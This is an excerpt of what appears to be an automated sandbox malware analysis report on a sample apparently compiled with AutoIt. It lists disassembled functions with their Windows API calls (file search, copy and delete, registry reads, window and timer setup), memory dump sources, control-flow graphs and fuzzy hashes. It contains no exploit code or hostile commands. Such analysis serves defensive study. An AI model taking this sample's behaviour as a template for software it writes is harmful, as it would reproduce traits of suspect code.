                                                                                        • Opcode Fuzzy Hash: 2c35b3d26c95a021f08b930a365da4d97caa2da8ff1c5750d170567e5b24b5e9
                                                                                        • Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99
                                                                                        Function 0046445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0046447B
                                                                                        • FindClose.KERNEL32(00000000), ref: 0046448B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                                        • String ID:
                                                                                        • API String ID: 48322524-0
                                                                                        • Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                                                        • Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
                                                                                        • Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                                                        • Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F
                                                                                        Function 004109D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
                                                                                        • timeGetTime.WINMM ref: 00410D16
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00410E61
                                                                                        • LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
                                                                                        • DestroyWindow.USER32 ref: 00410F06
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
                                                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
                                                                                        • TranslateMessage.USER32(?), ref: 00445C60
                                                                                        • DispatchMessageW.USER32(?), ref: 00445C6E
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbL$pbL$pbL$pbL
                                                                                        • API String ID: 4212290369-1082885916
                                                                                        • Opcode ID: 960a913c870402787ac0fe9eb6a7f9fa71df31c1dc3d5a98095aae0afc7fb667
                                                                                        • Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
                                                                                        • Opcode Fuzzy Hash: 960a913c870402787ac0fe9eb6a7f9fa71df31c1dc3d5a98095aae0afc7fb667
                                                                                        • Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A
                                                                                        Function 00AE8550 Relevance: 21.5, APIs: 14, Instructions: 538COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2311032865.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ac0000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFreeLast
                                                                                        • String ID:
                                                                                        • API String ID: 1762890227-0
                                                                                        • Opcode ID: b1be601fbf50d16c385c702461778f16e3131c5f805d66f977c4c8bd94c65e50
                                                                                        • Instruction ID: 3eb38364edb325e9b52197d1c86a55cb5ee878b88f872cd9553e5efc53fd1357
                                                                                        • Opcode Fuzzy Hash: b1be601fbf50d16c385c702461778f16e3131c5f805d66f977c4c8bd94c65e50
                                                                                        • Instruction Fuzzy Hash: 56F1F83094C3C1AEDB36576B4C4977A3BA06F72770F5C0A86E56D960F2DE6C8C05D226
                                                                                        Function 00469155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1129 469155-469205 call 431940 call 420db6 call 40522e call 468f5f call 404ee5 call 42354c 1142 46920b-469212 call 469734 1129->1142 1143 4692b8-4692bf call 469734 1129->1143 1148 4692c1-4692c3 1142->1148 1149 469218-4692b6 call 4240fb call 422dbc call 422d8d call 4240fb call 422d8d * 2 1142->1149 1143->1148 1150 4692c8 1143->1150 1151 46952a-46952b 1148->1151 1153 4692cb-469387 call 404f0b * 8 call 4698e3 call 42525b 1149->1153 1150->1153 1154 469548-469558 call 405211 1151->1154 1188 469390-4693ab call 468fa5 1153->1188 1189 469389-46938b 1153->1189 1192 4693b1-4693b9 1188->1192 1193 46943d-469449 call 4253a6 1188->1193 1189->1151 1194 4693c1 1192->1194 1195 4693bb-4693bf 1192->1195 1200 46945f-469463 1193->1200 1201 46944b-46945a DeleteFileW 1193->1201 1197 4693c6-4693e4 call 404f0b 1194->1197 1195->1197 1205 4693e6-4693eb 1197->1205 1206 46940e-469424 call 468953 call 424863 1197->1206 1203 469505-469519 CopyFileW 1200->1203 1204 469469-4694f2 call 4240bb call 4699ea call 468b06 1200->1204 1201->1151 1208 46952d-469543 DeleteFileW call 4698a2 1203->1208 1209 46951b-469528 DeleteFileW 1203->1209 1204->1208 1225 4694f4-469503 DeleteFileW 1204->1225 1211 4693ee-469401 call 4690dd 1205->1211 1222 469429-469434 1206->1222 1208->1154 1209->1151 1220 469403-46940c 1211->1220 1220->1206 1222->1192 1224 46943a 1222->1224 1224->1193 1225->1151
                                                                                        APIs
                                                                                          • Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69
                                                                                          • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                                                        • __wsplitpath.LIBCMT ref: 00469234
                                                                                          • Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B
                                                                                        • _wcscpy.LIBCMT ref: 00469247
                                                                                        • _wcscat.LIBCMT ref: 0046925A
                                                                                        • __wsplitpath.LIBCMT ref: 0046927F
                                                                                        • _wcscat.LIBCMT ref: 00469295
                                                                                        • _wcscat.LIBCMT ref: 004692A8
                                                                                          • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
                                                                                          • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED
                                                                                        • _wcscmp.LIBCMT ref: 004691EF
                                                                                          • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                                                          • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
                                                                                        • _wcsncpy.LIBCMT ref: 004694C5
                                                                                        • DeleteFileW.KERNEL32(?,?), ref: 004694FB
                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                        • String ID:
                                                                                        • API String ID: 1500180987-0
                                                                                        • Opcode ID: dafe4648b5bbac87b0fd5884d323520927b6c8dc5856a1245f48faeb858b36b7
                                                                                        • Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
                                                                                        • Opcode Fuzzy Hash: dafe4648b5bbac87b0fd5884d323520927b6c8dc5856a1245f48faeb858b36b7
                                                                                        • Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69
                                                                                        Function 00403015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                                        • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                                        • LoadIconW.USER32(000000A9), ref: 004030F2
                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                        • API String ID: 2914291525-1005189915
                                                                                        • Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                                                        • Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
                                                                                        • Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                                                        • Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69
                                                                                        Function 00403041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                                        • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                                        • LoadIconW.USER32(000000A9), ref: 004030F2
                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                        • API String ID: 2914291525-1005189915
                                                                                        • Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                                                        • Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
                                                                                        • Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                                                        • Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9
                                                                                        Function 0040708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1295 40708b-4071b0 call 431940 call 407667 call 404706 call 42050b call 407cab call 403f74 call 407667 call 407d8c RegOpenKeyExW 1312 43e8b1-43e8cc RegQueryValueExW 1295->1312 1313 4071b6-4071d3 call 405904 * 2 1295->1313 1315 43e943-43e94f RegCloseKey 1312->1315 1316 43e8ce-43e90d call 420db6 call 40522e RegQueryValueExW 1312->1316 1315->1313 1318 43e955-43e959 1315->1318 1329 43e92b-43e931 1316->1329 1330 43e90f-43e929 call 407bcc 1316->1330 1322 43e95e-43e984 call 4079f2 * 2 1318->1322 1335 43e986-43e994 call 4079f2 1322->1335 1336 43e9a9-43e9b6 call 422bfc 1322->1336 1333 43e933-43e940 call 420e2c * 2 1329->1333 1334 43e941 1329->1334 1330->1329 1333->1334 1334->1315 1335->1336 1345 43e996-43e9a7 call 422d8d 1335->1345 1347 43e9b8-43e9c9 call 422bfc 1336->1347 1348 43e9dc-43ea16 call 407de1 call 403f74 call 405904 call 4079f2 1336->1348 1357 43ea1c-43ea1d 1345->1357 1347->1348 1355 43e9cb-43e9db call 422d8d 1347->1355 1348->1313 1348->1357 1355->1348 1357->1322
                                                                                        APIs
                                                                                          • Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724
                                                                                          • Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D
                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0043E947
                                                                                        • _wcscat.LIBCMT ref: 0043E9A0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                        • API String ID: 2673923337-2727554177
                                                                                        • Opcode ID: 0a9ecf64a606f5250ff1c65417261d6d106e6d3aa24b6a52bf349d3d01a10bc1
                                                                                        • Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
                                                                                        • Opcode Fuzzy Hash: 0a9ecf64a606f5250ff1c65417261d6d106e6d3aa24b6a52bf349d3d01a10bc1
                                                                                        • Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A
                                                                                        Function 00403633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1365 403633-403681 1367 4036e1-4036e3 1365->1367 1368 403683-403686 1365->1368 1367->1368 1371 4036e5 1367->1371 1369 4036e7 1368->1369 1370 403688-40368f 1368->1370 1375 4036ed-4036f0 1369->1375 1376 43d0cc-43d0fa call 411070 call 411093 1369->1376 1372 403695-40369a 1370->1372 1373 40374b-403753 PostQuitMessage 1370->1373 1374 4036ca-4036d2 DefWindowProcW 1371->1374 1378 4036a0-4036a2 1372->1378 1379 43d154-43d168 call 462527 1372->1379 1380 403711-403713 1373->1380 1381 4036d8-4036de 1374->1381 1382 4036f2-4036f3 1375->1382 1383 403715-40373c SetTimer RegisterWindowMessageW 1375->1383 1410 43d0ff-43d106 1376->1410 1385 403755-403764 call 4044a0 1378->1385 1386 4036a8-4036ad 1378->1386 1379->1380 1404 43d16e 1379->1404 1380->1381 1389 4036f9-40370c KillTimer call 40443a call 403114 1382->1389 1390 43d06f-43d072 1382->1390 1383->1380 1387 40373e-403749 CreatePopupMenu 1383->1387 1385->1380 1392 4036b3-4036b8 1386->1392 1393 43d139-43d140 1386->1393 1387->1380 1389->1380 1396 43d074-43d076 1390->1396 1397 43d0a8-43d0c7 MoveWindow 1390->1397 1402 43d124-43d134 call 462d36 1392->1402 1403 4036be-4036c4 1392->1403 1393->1374 1400 43d146-43d14f call 457c36 1393->1400 1406 43d097-43d0a3 SetFocus 1396->1406 1407 43d078-43d07b 1396->1407 1397->1380 1400->1374 1402->1380 1403->1374 1403->1410 1404->1374 1406->1380 1407->1403 1411 43d081-43d092 call 411070 1407->1411 1410->1374 1414 43d10c-43d11f call 40443a call 40434a 1410->1414 1411->1380 1414->1374
                                                                                        APIs
                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
                                                                                        • KillTimer.USER32(?,00000001), ref: 004036FC
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
                                                                                        • CreatePopupMenu.USER32 ref: 0040373E
                                                                                        • PostQuitMessage.USER32(00000000), ref: 0040374D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                        • String ID: TaskbarCreated$%I
                                                                                        • API String ID: 129472671-1195164674
                                                                                        • Opcode ID: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                                                                                        • Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
                                                                                        • Opcode Fuzzy Hash: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                                                                                        • Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E
                                                                                        Function 00403A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                                                        • LoadIconW.USER32(00000063), ref: 00403A76
                                                                                        • LoadIconW.USER32(000000A4), ref: 00403A88
                                                                                        • LoadIconW.USER32(000000A2), ref: 00403A9A
                                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                                                        • RegisterClassExW.USER32(?), ref: 00403B16
                                                                                          • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                                          • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                                          • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                                          • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                                          • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                                          • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
                                                                                          • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                        • String ID: #$0$AutoIt v3
                                                                                        • API String ID: 423443420-4155596026
                                                                                        • Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                                                        • Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
                                                                                        • Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                                                        • Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88
                                                                                        Function 00ACCE90 Relevance: 16.2, APIs: 10, Instructions: 1189COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2311032865.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ac0000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8dc7f4b30052b6cb52ddb82493b5d8c2b428c27bf90b9751001ecefd60676834
                                                                                        • Instruction ID: 0a8a11501c4b2b496d411e731890518ce52897c651fa4c278f3760f63942d82d
                                                                                        • Opcode Fuzzy Hash: 8dc7f4b30052b6cb52ddb82493b5d8c2b428c27bf90b9751001ecefd60676834
                                                                                        • Instruction Fuzzy Hash: 43A27C7190D3809FC735CB18C844FAABBE1AFD5328F0E496DE49997292D735A804CB97
                                                                                        Function 00403766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
